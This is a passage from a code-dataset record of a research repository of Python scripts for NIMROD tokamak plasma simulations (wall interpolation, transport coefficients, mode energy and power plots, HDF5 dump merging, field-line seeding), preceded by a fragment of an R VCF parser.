readVcf(input_vcf, \"hg19\")\n snvs <- names(ranges(vcf))\n if(length(snvs) > 0) {\n snv_txt <- sapply(snvs, function(snv) {\n paste(cell_barcode, clone, paste0(snv, \"\\n\"), sep = \",\")\n })\n cat(paste(snv_txt, collapse = \"\"))\n }\n}\n\naargh(parse_vcf)\n" } ]
5
echowell/nimrodscripts
https://github.com/echowell/nimrodscripts
cd1daf77927299ec367707f94ae8b4376e69e172
0b5747032aff1183a02d2693e9959928bae22c33
e9499dd08892fb2bfd1fa74e92d296bcf3830b10
refs/heads/master
2022-11-07T11:46:24.341517
2022-10-28T20:41:20
2022-10-28T20:41:20
167,447,931
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6597998738288879, "alphanum_fraction": 0.6933490037918091, "avg_line_length": 35.956520080566406, "blob_id": "db30c0fdf1d5992facb6268e8e0cd3a10d094f6e", "content_id": "7a1a5e4113c49acd6afe58b38e670e1a8bedfd84", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1699, "license_type": "no_license", "max_line_length": 111, "num_lines": 46, "path": "/trip2Nim/tripInterpolate.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\n''' Intepolate B(R,Z,PHI) from one set of RZ points onto a second set.\n\n Both set's of RZ points are assumed to be on the same surface.\n First: Read NIMROD wall file and the RZ points are Fouier Transformed\n Second: Read TRIP3D files, and Fourier transform B\n Third: Read new RZ locations, and find theta of this coordinates\n Finally: Interpolate B onto new coordinates\n'''\n\nimport sys\nsys.path.insert(0, \"./\")\nimport os\nimport nim_wall as wall\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nhome_dir = os.environ['HOME']\nscratch_dir = home_dir + \"/SCRATCH\"\nfile_dir = scratch_dir + \"/166439/03300_2_equilbria/19061201\"\nwall_file = \"wall_file_2.txt\"\nfull_wall_file_path = file_dir + \"/\" + wall_file\nnew_rz_file = \"nimrod_bdry_rz.txt\"\nfull_new_rz_file_path = file_dir + \"/\" + new_rz_file\nfull_wall_file_path = \"/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/flow_60/nimrod_bdry_rz.txt\"\nwall_modes = -1\n\nthis_wall = wall.NimrodWall(full_wall_file_path, wall_modes)\n\nnew_rz = np.loadtxt(full_new_rz_file_path, delimiter=',', skiprows=1)\n#old_rz = np.loadtxt(full_old_rz_file_path, delimiter=',', skiprows=1)\nnew_theta = np.zeros(new_rz.shape[0])\nerr_theta = np.zeros(new_rz.shape[0])\nfor ix in range(new_rz.shape[0]):\n new_theta[ix], err_theta[ix] = this_wall.get_theta_rz(new_rz[ix,0],new_rz[ix,1])\nprint (new_theta)\nprint (err_theta)\n\n\nplt.plot(this_wall.file_rz[:,0],this_wall.file_rz[:,1], 'bo', label=\"Orginal Wall\")\nplt.plot(this_wall.rz_wall[:,0],this_wall.rz_wall[:,1], 'g-', label=\"Smooth Wall\")\nplt.plot(new_rz[:,0],new_rz[:,1],'k', label=\"New Rz\")\n#plt.plot(old_rz[:,0],old_rz[:,1],'g', label=\"Old Rz\")\nplt.legend(loc=1)\nplt.show()" }, { "alpha_fraction": 0.6840182542800903, "alphanum_fraction": 0.7196347117424011, "avg_line_length": 21.83333396911621, "blob_id": "ec577eac2bd624a15c43c6732f678d70877bdb28", "content_id": "27c6c86f450f00685f74beca47bf65a12eb1bf7b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1095, "license_type": "no_license", "max_line_length": 69, "num_lines": 48, "path": "/transport_calculator/neoclassical_coeff.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport numpy as np\nimport plasma_constants as pc\n\n\n### set background plasma parameters\nne = 6.82e19 #m^-3\nte = 1504. #eV\nti = 1754. #eV\nzeff = 3.25\nni = 3.49e19 #m^-3 rough guess\n\nepsilon = 0.25 # magnetic inverse aspect ratio\nR0 = 1.696\nq0 = 2.0\n\n#calcularte classical values for electrons and ions with impurities\n#here I assume the the Coulomb Log is the same for both electron and \n#ions\nlogLam = pc.coulombLog(te,ne)\nnu_e = pc.nu_e(ne,te,zeff,logLam)\nvte = pc.vte(te)\nlambda_e = vte/nu_e\nzStar=pc.zStar(ne,ni,zeff)\nnu_i = pc.nu_i(ni,ti,pc.md,zStar,logLam)\nvti = pc.vts(ti,pc.md) \nlambda_i = vti/nu_i\n\nfc = pc.circulatingFraction(epsilon)#circuling fraction\nnueBanana = pc.nuBanana(nu_e,epsilon)\nnuiBanana = pc.nuBanana(nu_i,epsilon)\n\nnueStar = pc.nuStar(R0,q0,epsilon,lambda_e)\nnuiStar = pc.nuStar(R0,q0,epsilon,lambda_i)\nmu_e = pc.neoMue(nu_e,nueStar,zeff,epsilon)\nmu_i = pc.neoMue(nu_i,nuiStar,zStar,epsilon)\nprint(logLam)\nprint(nu_e)\nprint(nu_i)\nprint (lambda_e)\nprint (lambda_i)\nprint(nu_i/nu_e)\nprint(fc)\nprint(nueStar)\nprint(nuiStar)\nprint(mu_e)\nprint(mu_i)" }, { "alpha_fraction": 0.5484074950218201, "alphanum_fraction": 0.5910642147064209, "avg_line_length": 38.26551055908203, "blob_id": "195ce0a350b71c56aa6bb25a982d00df0f3712b0", "content_id": "7518a63b8377c8120f23a47145f00c800c7a6a24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15824, "license_type": "no_license", "max_line_length": 106, "num_lines": 403, "path": "/hocradic/hcPlot.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#\nimport os\nimport h5py\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport argparse\nimport pickle\nimport glob\nfrom shutil import copy2\nimport hcStep as step\nimport nim_timer as nimtime\nimport matplotlib.colors as mcolors\n\n\ndef pickle_sort(file):\n #print(file[5:],file.split('.'))\n return int(file.split('.')[1])\n\ndef find_files(thisdir):\n ''' This fuction finds the hc, dump files in the directory\n input: thisdir\n output: hc filename, dumpfilename, stepnumber, step time\n the outputs return None, if a file does not exists\n '''\n dumpfile=None\n nimrodin=None\n listobjs = os.listdir(thisdir)\n for iobj in listobjs:\n wordlist = iobj.split('.')\n if (wordlist[0].lower()=='dumpgll' and wordlist[-1]=='h5'):\n if (dumpfile==None):\n dumpfile=iobj\n else:\n print(f\"Multiple dumpfiles in directory {thisdir}\")\n raise\n elif (iobj=='nimrod.in'):\n nimrodin=iobj\n\n return dumpfile, nimrodin\n\ndef hcplot(args):\n pickle_suf=[\"pickle\"]\n pickle_pre=[\"power\"]\n steplist = []\n nmode_list = [1,2,3,4,5]\n color_list = ['tab:blue','tab:green','tab:red','tab:purple','tab:brown']\n times = None\n if args['read']:\n pickle_list=glob.glob(\"power.*\")\n pickle_list.sort(key=pickle_sort)\n time_steps = len(pickle_list)\n times = np.zeros(time_steps)\n nmodes = len(nmode_list)\n mag_energy = np.zeros([time_steps,nmodes])\n kin_energy = np.zeros([time_steps,nmodes])\n lin_power = np.zeros([time_steps,nmodes])\n qua_power = np.zeros([time_steps,nmodes])\n non_power = np.zeros([time_steps,nmodes])\n ohm_power = np.zeros([time_steps,nmodes])\n visc_power = np.zeros([time_steps,nmodes])\n neoi_power = np.zeros([time_steps,nmodes])\n neoe_power = np.zeros([time_steps,nmodes])\n poyn_power = np.zeros([time_steps,nmodes])\n press_power = np.zeros([time_steps,nmodes])\n adv_power = np.zeros([time_steps,nmodes])\n total_power = np.zeros([time_steps,nmodes])\n# adv_power = np.zeros([time_steps,nmodes])\n if len(pickle_list)>0:\n for ii, file in enumerate(pickle_list):\n print(file)\n this=step.hcstep(None,None)\n this.load(file)\n steplist.append(this)\n times[ii] = this.time\n for jj, nn in enumerate(nmode_list):\n mag_energy[ii,jj]=this.energyDict['bpert'][nn]\n kin_energy[ii,jj]=this.energyDict['vpert'][nn]\n lin_power[ii,jj]=this.powerDict['vxbeq'][nn] + \\\n this.powerDict['jxbeq'][nn] + \\\n this.powerDict['ngpp'][nn]\n qua_power[ii,jj]=this.powerDict['vxbn0'][nn] + \\\n this.powerDict['jxbn0'][nn]\n non_power[ii,jj]=this.powerDict['vxbp'][nn] + \\\n this.powerDict['jxbp'][nn]\n ohm_power[ii,jj]=this.powerDict['etajp'][nn]\n visc_power[ii,jj]=this.powerDict['divpip'][nn]\n neoi_power[ii,jj]=this.powerDict['divPii'][nn]\n neoe_power[ii,jj]=this.powerDict['divPie'][nn]\n poyn_power[ii,jj]=this.powerDict['poynting'][nn]\n adv_power[ii,jj]=this.powerDict['rhovdveq'][nn] + \\\n this.powerDict['rhovdvn0'][nn] + \\\n this.powerDict['rhovdvp'][nn]\n\n\n #adv_power[ii,jj]=this.powerDict['ngpp'][nn]\n for key in this.powerDict:\n print(key)\n total_power[ii,jj]+=this.powerDict[key][nn]\n total_energy = mag_energy+kin_energy\n total_energy = np.where(total_energy != 0, total_energy,0.01 )\n diss_power = ohm_power + visc_power + neoi_power + neoe_power\n else:\n print(\"Hc plot can not read dumpfiles\")\n raise KeyError\n figsize=[8,6]\n\n #plot magnetic energy\n fig, ax = plt.subplots(figsize=figsize)\n for jj, nn in enumerate(nmode_list):\n label = f\"n = {nn}\"\n plt.plot(times*1000,total_energy[:,jj],label=label,color=color_list[jj])\n plt.legend(ncol=2, loc=1, fontsize = 18,frameon=True)\n plt.title(\"Toroidal Mode Energy\")\n plt.ylabel('Energy [J]')\n plt.xlabel('Time [ms]')\n plt.ylim([0,30])\n ax.axvspan(0, 1.0, alpha=0.2,color='gray')\n plt.tight_layout()\n plt.show()\n\n fig, ax = plt.subplots(figsize=figsize)\n jj=2\n plt.title(\"n=3 Power\")\n plt.plot(times*1000,total_power[:,jj]/1e3,label=\"Total\",color='tab:brown')\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"Lin\",color='tab:orange')\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"QL\",color='tab:green')\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"NL\",color='tab:red')\n plt.plot(times*1000,diss_power[:,jj]/1e3,label=\"Diss\",color='tab:purple')\n plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"PF\",color='tab:blue')\n plt.legend(ncol=3, loc='lower center', fontsize = 18,frameon=True)\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n #plt.ylim([0,30])\n ax.axvspan(0, 1.0, alpha=0.2,color='gray')\n plt.axhline(0,color='k')\n plt.tight_layout()\n plt.show()\n\n fig, ax = plt.subplots(figsize=figsize)\n jj=1\n plt.title(\"n=2 Power\")\n plt.plot(times*1000,total_power[:,jj]/1e3,label=\"Total\",color='tab:brown')\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"Lin\",color='tab:orange')\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"QL\",color='tab:green')\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"NL\",color='tab:red')\n plt.plot(times*1000,diss_power[:,jj]/1e3,label=\"Diss\",color='tab:purple')\n plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"PF\",color='tab:blue')\n plt.legend(ncol=3, loc='lower center', fontsize = 18,frameon=True)\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.ylim([-300,300])\n ax.axvspan(0, 1.0, alpha=0.2,color='gray')\n plt.axhline(0,color='k')\n plt.tight_layout()\n plt.show()\n\n fig, ax = plt.subplots(figsize=figsize)\n jj=2\n plt.title(\"n=3 Power\")\n plt.plot(times*1000,total_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Total\",color='tab:brown')\n plt.plot(times*1000,lin_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Lin\",color='tab:orange')\n plt.plot(times*1000,qua_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"QL\",color='tab:green')\n plt.plot(times*1000,non_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"NL\",color='tab:red')\n plt.plot(times*1000,diss_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Diss\",color='tab:purple')\n plt.plot(times*1000,poyn_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"PF\",color='tab:blue')\n plt.legend(ncol=3, loc='lower center', fontsize = 18,frameon=True)\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.ylim([-20,20])\n ax.set_xlim(left=2.0)\n ax.axvspan(0, 1.0, alpha=0.2,color='gray')\n plt.axhline(0,color='k')\n plt.tight_layout()\n plt.show()\n\n\n fig, ax = plt.subplots(figsize=figsize)\n jj=0\n plt.title(\"n=1 Power\")\n plt.plot(times*1000,total_power[:,jj]/1e3,label=\"Total\",color='tab:brown')\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"Lin\",color='tab:orange')\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"QL\",color='tab:green')\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"NL\",color='tab:red')\n plt.plot(times*1000,diss_power[:,jj]/1e3,label=\"Diss\",color='tab:purple')\n plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"PF\",color='tab:blue')\n plt.legend(ncol=3, loc='lower center', fontsize = 18,frameon=True)\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.ylim([-50,50])\n ax.axvspan(0, 1.0, alpha=0.2,color='gray')\n plt.axhline(0,color='k')\n plt.tight_layout()\n plt.show()\n\n\n #plot magnetic energy\n fig, ax = plt.subplots(figsize=figsize)\n for jj, nn in enumerate(nmode_list):\n if nn !=1:\n continue\n label = f\"n = {nn}\"\n# plt.plot(times*1000,total_energy[:,jj],label=label)\n plt.plot(times*1000,total_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=label)\n plt.legend()\n plt.title(\"Effective Growth Rate\")\n plt.ylabel(f'$\\gamma$ [krad/s]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n\n\n #plot power flux\n for jj, nn in enumerate(nmode_list):\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"Linear\")\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"Quasi-linear\")\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"Nonlinear\")\n plt.plot(times*1000,ohm_power[:,jj]/1e3,label=\"etaJ\")\n plt.plot(times*1000,total_power[:,jj]/1e3,label=\"total\")\n plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"poynting\")\n plt.legend()\n plt.axhline(0,color='k')\n plt.title(Title)\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n #plot power flux\n for jj, nn in enumerate(nmode_list):\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n plt.plot(times*1000,lin_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Linear\")\n plt.plot(times*1000,qua_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Quasi-linear\")\n plt.plot(times*1000,non_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Nonlinear\")\n plt.plot(times*1000,ohm_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"etaJ\")\n plt.plot(times*1000,neoe_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"neoE\")\n plt.plot(times*1000,visc_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Visc\")\n plt.plot(times*1000,total_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"total\")\n plt.plot(times*1000,poyn_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"poynting\")\n plt.legend()\n plt.axhline(0,color='k')\n plt.title(Title)\n plt.ylabel(f'$\\gamma$ [krad/s]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n #plot power flux\n for jj, nn in enumerate(nmode_list):\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n plt.plot(times*1000,total_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"total\")\n plt.plot(times*1000,qua_power[:,jj]/(2*total_energy[:,jj])*1e-3,label=\"Quasi-linear\")\n plt.plot(times*1000,(total_power[:,jj]-qua_power[:,jj])/(2*total_energy[:,jj])*1e-3,label=\"total\")\n plt.legend()\n plt.axhline(0,color='k')\n plt.title(Title)\n plt.ylabel(f'$\\gamma$ [krad/s]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n #plot power flux\n fig, ax = plt.subplots(figsize=figsize)\n\n plt.plot(times*1000,non_power[:,0],label=\"n =1 \")\n plt.plot(times*1000,non_power[:,1],label=\"n =2 \")\n plt.plot(times*1000,non_power[:,2],label=\"n =3\")\n plt.plot(times*1000,non_power[:,3],label=\"n =4\")\n plt.plot(times*1000,non_power[:,4],label=\"n =5\")\n plt.legend()\n plt.axhline(0,color='k')\n plt.title(Title)\n plt.ylabel(f'$\\gamma$ [krad/s]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n raise\n\n #n=1 power flux\n jj=0\n nn=1\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"L\")\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"QL\")\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"NL\")\n plt.plot(times*1000,ohm_power[:,jj]/1e3,label=\"etaJ\")\n plt.plot(times*1000,adv_power[:,jj]/1e3,label=\"adv\")\n# plt.plot(times*1000,visc_power[:,jj]/1e3,label=\"Viscous\")\n# plt.plot(times*1000,neoi_power[:,jj]/1e3,label=\"Neoclassical ion\")\n# plt.plot(times*1000,neoe_power[:,jj]/1e3,label=\"Neoclassical electron\")\n# plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"Poynting\")\n plt.legend()\n plt.title(Title)\n plt.axhline(0,color='k')\n plt.ylim([-60,20])\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n jj=1\n nn=2\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"L\")\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"QL\")\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"NL\")\n plt.plot(times*1000,ohm_power[:,jj]/1e3,label=\"etaJ\")\n # plt.plot(times*1000,visc_power[:,jj]/1e3,label=\"Viscous\")\n # plt.plot(times*1000,neoi_power[:,jj]/1e3,label=\"Neoclassical ion\")\n # plt.plot(times*1000,neoe_power[:,jj]/1e3,label=\"Neoclassical electron\")\n # plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"Poynting\")\n plt.legend(loc=2)\n plt.title(Title)\n plt.axhline(0,color='k')\n plt.ylim([-200,250])\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n jj=2\n nn=3\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"L\")\n plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"QL\")\n plt.plot(times*1000,non_power[:,jj]/1e3,label=\"NL\")\n plt.plot(times*1000,ohm_power[:,jj]/1e3,label=\"etaJ\")\n # plt.plot(times*1000,visc_power[:,jj]/1e3,label=\"Viscous\")\n # plt.plot(times*1000,neoi_power[:,jj]/1e3,label=\"Neoclassical ion\")\n # plt.plot(times*1000,neoe_power[:,jj]/1e3,label=\"Neoclassical electron\")\n # plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"Poynting\")\n plt.legend(loc=2)\n plt.title(Title)\n plt.axhline(0,color='k')\n #plt.ylim([-200,250])\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n for jj, nn in enumerate(nmode_list):\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n# plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"Linear\")\n# plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"Quasi-linear\")\n# plt.plot(times*1000,non_power[:,jj]/1e3,label=\"Nonlinear\")\n# plt.plot(times*1000,ohm_power[:,jj]/1e3,label=\"Ohmic\")\n plt.plot(times*1000,visc_power[:,jj]/1e3,label=\"Visc\")\n plt.plot(times*1000,neoi_power[:,jj]/1e3,label=\"Neo ion\")\n plt.plot(times*1000,neoe_power[:,jj]/1e3,label=\"Neo e-\")\n plt.plot(times*1000,poyn_power[:,jj]/1e3,label=\"Poyn\")\n# plt.plot(times*1000,press_power[:,jj]/1e3,label=\"Grad P\")\n plt.legend()\n plt.title(Title)\n plt.axhline(0,color='k')\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n for jj, nn in enumerate(nmode_list):\n fig, ax = plt.subplots(figsize=figsize)\n Title = f\"n = {nn} Power\"\n\n# plt.plot(times*1000,lin_power[:,jj]/1e3,label=\"Linear\")\n# plt.plot(times*1000,qua_power[:,jj]/1e3,label=\"Quasi-linear\")\n# plt.plot(times*1000,non_power[:,jj]/1e3,label=\"Nonlinear\")\n# plt.plot(times*1000,ohm_power[:,jj]/1e3,label=\"Ohmic\")\n plt.plot(times*1000,total_power[:,jj]/1e3,label=\"Total Power\")\n plt.legend()\n plt.title(Title)\n plt.axhline(0,color='k')\n plt.ylabel('Power [kW]')\n plt.xlabel('Time [ms]')\n plt.tight_layout()\n plt.show()\n\n for this in steplist:\n pass\n# this.print_integrals()\n# nimtime.timer.print_times()\n# print(this.step, this.time)\n #plot data here\n if args['plot']:\n pass\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Ho-Cradick runner.')\n parser.add_argument('--read', action='store_true',help='read pickled data')\n args = vars(parser.parse_args())\n print(args)\n hcplot(args=args)\n" }, { "alpha_fraction": 0.7411273717880249, "alphanum_fraction": 0.743215024471283, "avg_line_length": 33.28571319580078, "blob_id": "eba71caeee4fb1751279670820748171acb09279", "content_id": "ba6a4d78ad7c4bdf34cc28dd8865a5fb7a5fe294", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 479, "license_type": "no_license", "max_line_length": 117, "num_lines": 14, "path": "/diiidNim/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# diiidNim\nA collection of python scripts that are useful for simulations of DIII-D experiments.\n\n## iCoilWallUtil\nThis script is used to generate a new DIII-D \"wall\", such that all the points are inside the i-coils.\n\n## startPositions\nThis script is used to seed a bunch of NIMFL start positions that lie inside the NIMRODs DIII-D computational domain.\n\n### Todo\n - [ ] Documents scripts\n - [ ] Clean up code\n - [ ] Convert to python 3\n - [ ] Add more scripts from work computer" }, { "alpha_fraction": 0.5517538189888, "alphanum_fraction": 0.5926403999328613, "avg_line_length": 35.55118179321289, "blob_id": "76560a374727e7b7136496252ee62c57e0a2375c", "content_id": "310f600ba61ced168b43aa1987815664da5a7050", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4647, "license_type": "no_license", "max_line_length": 103, "num_lines": 127, "path": "/combineDump/combineDump.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n#\n# Input files:\n# firstDump - hdf5 dump file with equilibrium and first nk perturbation\n# secondDump - hdf5 dump file with last nk perturbation\n# Ouput file:\n# finalDump -hdf5 dump file that has combines the perturbed fourier nmodes\n# from each dump file\n# I assume that the is no overlap in keff\nimport h5py\nfrom itertools import product\nimport numpy as np\n\nveList = [ 'bq' , 'diff', 'jq', 'nq', 'peq', 'prq', 'rz', 'vq', 'psi_eq']\nvvList = [ 'imbe', 'imve', 'rebe', 'reve']\n\nvsList = [ 'imconc', 'imnd', 'impe', 'impr', 'imte', 'imti', \\\n 'reconc', 'rend', 'repe', 'repr', 'rete', 'reti' ]\n\n\nbasePath = '/home/research/ehowell/SCRATCH/166439/03300_q104_reorder_combine/vac/'\n\nfirstDump = basePath+'n0-5/dumpglln04.h5'\nsecondDump = basePath+'n5/dumpglln5.h5'\nfinalDump = basePath+'n0-5/dumpglln05.h5'\n\nnewStep=0\nnewTime=0.0\n\nf1 = h5py.File(firstDump, 'r') #fe\nf2 = h5py.File(secondDump, 'r') #fp\nfc = h5py.File(finalDump, 'w') #f0\n\n# reset time and step\nf1.copy(f1['dumpTime'], fc)\nfc['dumpTime'].attrs.modify('vsStep',newStep)\nfc['dumpTime'].attrs.modify('vsTime',newTime)\n\nnk1=f1['keff'].size\nnk2=f2['keff'].size\nnkc = nk1 + nk2\nnewKeff = np.zeros(nkc)\nfor ii in range(nk1):\n newKeff[ii]=f1['keff'][ii]\nfor ii in range(nk2):\n newKeff[nk1+ii]=f2['keff'][ii]\nfc.create_dataset('keff', data=newKeff)\n\nfc.copy(f1['seams'], fc)\n# copy file attriubtes and update nmodes\nfor aname, avalue in f1.attrs.items():\n fc.attrs[aname] = avalue \nfc.attrs['nmodes'] = nkc\n\nfc.create_group('rblocks')\n# rblocks has no attributes\n#for aname, avalue in f1['rblocks'].attrs.items():\n# print(aname,avalue)\n# fc['rblocks'].attrs[aname] = avalue \n#fc['rblocks'].attrs['nmodes'] = nkc\n\n#loop over rblocks in list\nfor re in f1['rblocks'].keys():\n print('Processing rblock ' + re)\n g1 = f1['rblocks/'+re]\n g2 = f2['rblocks/'+re]\n gc = fc.create_group('rblocks/'+re)\n for aname, avalue in g1.attrs.items():\n gc.attrs[aname] = avalue\n gc.attrs['nfour'] = nkc\n\n for d1key, d1value in g1.items():\n# copy eq fieds from first dumpfile\n if d1key.startswith(tuple(veList)):\n gc.create_dataset(d1key, data=d1value)\n for aname, avalue in g1[d1key].attrs.items():\n gc[d1key].attrs[aname] = avalue\n continue\n d2value=g2[d1key][:]\n if(d1key.startswith(tuple(vsList))): #scalar field\n dcvalue=np.zeros([d1value.shape[0],d1value.shape[1],nkc])\n for (iv,jv) in product(range(d1value.shape[0]),range(d1value.shape[1])):\n dcvalue[iv,jv,0:nk1-1]=d1value[iv][jv][0:nk1-1]\n dcvalue[iv,jv,nk1:nkc-1]=d2value[iv][jv][nk1:nkc-1]\n else: #vector field\n dcvalue=np.zeros([d1value.shape[0],d1value.shape[1],3*nkc])\n for (iv,jv) in product(range(d1value.shape[0]),range(d1value.shape[1])):\n for nn in range(nk1):\n dcvalue[iv,jv,3*nn]=d1value[iv][jv][3*nn]\n dcvalue[iv,jv,3*nn+1]=d1value[iv][jv][3*nn+1]\n dcvalue[iv,jv,3*nn+2]=d1value[iv][jv][3*nn+2]\n for nn in range(nk1,nkc):\n dcvalue[iv,jv,3*nn]=d2value[iv][jv][3*(nn-nk1)]\n dcvalue[iv,jv,3*nn+1]=d2value[iv][jv][3*(nn-nk1)+1]\n dcvalue[iv,jv,3*nn+2]=d2value[iv][jv][3*(nn-nk1)+2]\n gc.create_dataset(d1key, data=dcvalue)\n for aname, avalue in g1[d1key].attrs.items():\n gc[d1key].attrs[aname] = avalue\n print(d1key, d1value.shape, d2value.shape, dcvalue.shape)\n# print(d1key,d1value.shape,d2value.shape)\n# for (iv,jv) in product(range(len(d1value)),range(len(d1value[0]))):\n# if d1key.startswith(tuple(vsList)):\n# print(d1key)\n'''\n for de in ge.iteritems() :\n dse = de[1][:]\n if de[0].startswith('psi_eq') : \n continue\n dsp = gp[de[0]][:]\n for (iv,jv) in product(range(len(dse)),range(len(dse[0]))) :\n if de[0].startswith(tuple(vsList)) :\n\tdse[iv][jv] = 0. * len(dse[iv][jv])\n\tfor n in nList :\n dse[iv][jv][n] = dsp[iv][jv][nList[n]] \n elif de[0].startswith(tuple(vvList)) :\n\t#if de[0]=='reve0001' :\n\t# print de[0], iv, jv, len(dse[iv][jv]), dse[iv][jv][3*0:3*0+2], dsp[iv][jv][3*nList[0]:3*nList[0]+2]\n\tdse[iv][jv] = 0. * len(dse[iv][jv])\n\tfor n in nList :\n\t dse[iv][jv][3*n] = dsp[iv][jv][3*nList[n]]\n\t dse[iv][jv][3*n+1] = dsp[iv][jv][3*nList[n]+1]\n\t dse[iv][jv][3*n+2] = dsp[iv][jv][3*nList[n]+2]\n \n g0.create_dataset(de[0], data=dse)\n for aname, avalue in ge[de[0]].attrs.items():\n g0[de[0]].attrs[aname] = avalue\n'''\n " }, { "alpha_fraction": 0.40676796436309814, "alphanum_fraction": 0.42196133732795715, "avg_line_length": 39.25, "blob_id": "b45d783659f78268e2f8ebfffed11ce988fa3081", "content_id": "096eb15fff61d27e94bd284ff807bc3a66ede3d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1448, "license_type": "no_license", "max_line_length": 83, "num_lines": 36, "path": "/nimflSeed/nimflSeed.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n''' This script randomly generates a collection of seed locations of NIMFL\nfield line integration'''\n\n################################################################################\n# Set up envirment and import modules\n################################################################################\nimport sys\nsys.path.insert(0, \"./\")\nimport os\nimport startPosClass as sp\npwd = os.getcwd()\nhomeDir = os.environ['HOME']\n################################################################################\n# User defined input\n################################################################################\nfileName = \"start_positions.dat_1\"\nwriteDirectory = pwd\nwriteDirectory = homeDir + \"/SCRATCH/174446_novac_debug/nonlin1_eq26_rmp_nimfl/179\"\nnPoints = 2000\ngeom = 'd3dlower'\nphiZero = 0.0\nrandomPhi = True # Ture\n################################################################################\n# Set up auxiliary variables \n################################################################################\nwriteFile = writeDirectory + 